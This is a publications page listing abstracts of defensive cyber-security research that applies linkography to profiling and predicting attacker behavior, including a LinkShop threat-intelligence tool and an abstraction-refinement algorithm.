Publications

Attacks authored by state sponsored actors, criminal outfits, ideological enclaves and recreational hackers continue to trouble public and private cyber systems. In order to create and/or maintain an advantage over their adversaries, cyber defenders must pursue novel ways to detect, attribute and respond to offensive operations. Linkography is a topic that has been explored for decades that has found recent application to cyber security. Given the huge amounts of data available for cyber security applications of linkography, we favor semi-automated techniques to exploit this concept. In this paper, we propose a human supervised algorithm that will refine the abstractions used for this bulk approach to linkography. We found this algorithm resulted in automatically generated linkographs with higher accuracies than those derived from static abstractions. These findings suggest that linkography in general and abstraction refinement in particular are viable tools for cyber security practitioners.

Intuitively, nodes are actions that happen in a sequence. Thus, node 0 happens before node 1, node 1 happens before node 2, and so on. A link indicates that there is a relationship between two nodes, that is, (i, j) indicates that i influenced j and j was influenced by i.

The war to establish cyber supremacy continues, and the literature is crowded with strictly technical cyber security measures. We present the results of a three year LDRD project using Linkography, a methodology new to the field of cyber security, we establish the foundation necessary to track and profile the microbehavior of humans attacking cyber systems. We also propose ways to leverage this understanding to influence and deceive these attackers. We studied the science of linkography, applied it to the cyber security domain, implemented a software package to manage linkographs, generated the preprocessing blocks necessary to ingest raw data, produced machine learning models, created ontology refinement algorithms and prototyped a web application for researchers and practitioners to apply linkography. Machine learning produced some of our key results: We trained and validated multinomial classifiers with a real world data set and predicted the attacker's next category of action with 86 to 98% accuracy; dimension reduction techniques indicated that the linkography-based features were among the most powerful. We also discovered ontology refinement algorithms that advanced the state of the art in linkography in general and cyber security in particular. We conclude that linkography is a viable tool for cyber security; we look forward to expanding our work to other data sources and using our prediction results to enable adversary deception techniques.

Abstract not provided.

In the realm of cyber security, recent events have demonstrated the need for a significant change in the philosophies guiding the identification and mitigation of attacks. The unprecedented increase in the quantity and sophistication of cyber attacks in the past year alone has proven the inadequacy of current defensive philosophies that do not assume continuous compromise. This has given rise to new perspectives on cyber defense where, instead of total prevention, threat intelligence is the crucial tool allowing the mitigation of cyber threats. This paper formalizes a new framework for obtaining threat intelligence from an active cyber attack and demonstrates the realization of this framework in the software tool, LinkShop. Specifically, using the behavioral analysis technique known as linkography, our framework allows cyber defenders to, in an automated fashion, quantitatively capture both general and nuanced patterns in attacker's behavior - pushing capabilities for generating threat intelligence far beyond what is currently possible with rudimentary indicators of compromise and into the realm of capability needed to combat future cyber attackers. Furthermore, this paper shows in detail how such knowledge can be achieved by using LinkShop on actual cyber event data and lays a foundation for further scientific investigation into cyber attacker behavior.

Abstract not provided.

Abstract not provided.